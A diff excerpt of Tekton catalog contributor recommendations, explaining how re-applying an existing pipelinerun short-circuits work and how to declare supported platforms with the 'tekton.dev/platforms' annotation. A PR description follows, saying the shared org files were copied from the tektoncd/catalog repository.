+commit, it will again _apply_ the pipelinerun `run-abc123def`.  Since
+it already exists, nothing happens.
+
+This technique can be used to "short circuit" work when it is not
+necessary to _re-run_.
+
+## Provide "tekton.dev/platforms" annotation
+
+`tekton.dev/platforms` annotation indicates on which platforms (for
+instance, "linux/amd64,linux/arm64" or "windows/amd64") resource can
+be run.
+The most reliable option to verify the platform list is to run the
+e2e tests provided with the resource. Minimal requirement is to use
+the container image, which has support for corresponding platform.
+
+Add `Platforms` section into the README.md of the corresponding resource.
+If running of the resource on specific platform requires to use another
+image or do other customization, it should be also mentioned in the section.
+
+If you don't know, which platforms to specify, good start is to use
+"linux/amd64", as it is most popular platform and most likely the tests,
+you've done, were on top of it.


### PR DESCRIPTION
This commit adds the common files that are shared across the org, including `PR & Issue template`, `LICENSE`, `code-of-conduct.md`, `CONTRIBUTING.md`, `DEVELOPMENT.md`, `recommendations.md` and `README.md` files. This commit just copies contents from https://github.com/tektoncd/catalog. Changes reflecting the decentralized repo model and git-based versioning will be added in later PRs.

This repository is created to hold some shared content for all catalog repositories under the org. The individual catalog repos can link to the files in this repo for general information, then add extra information to fit each catalogs' need.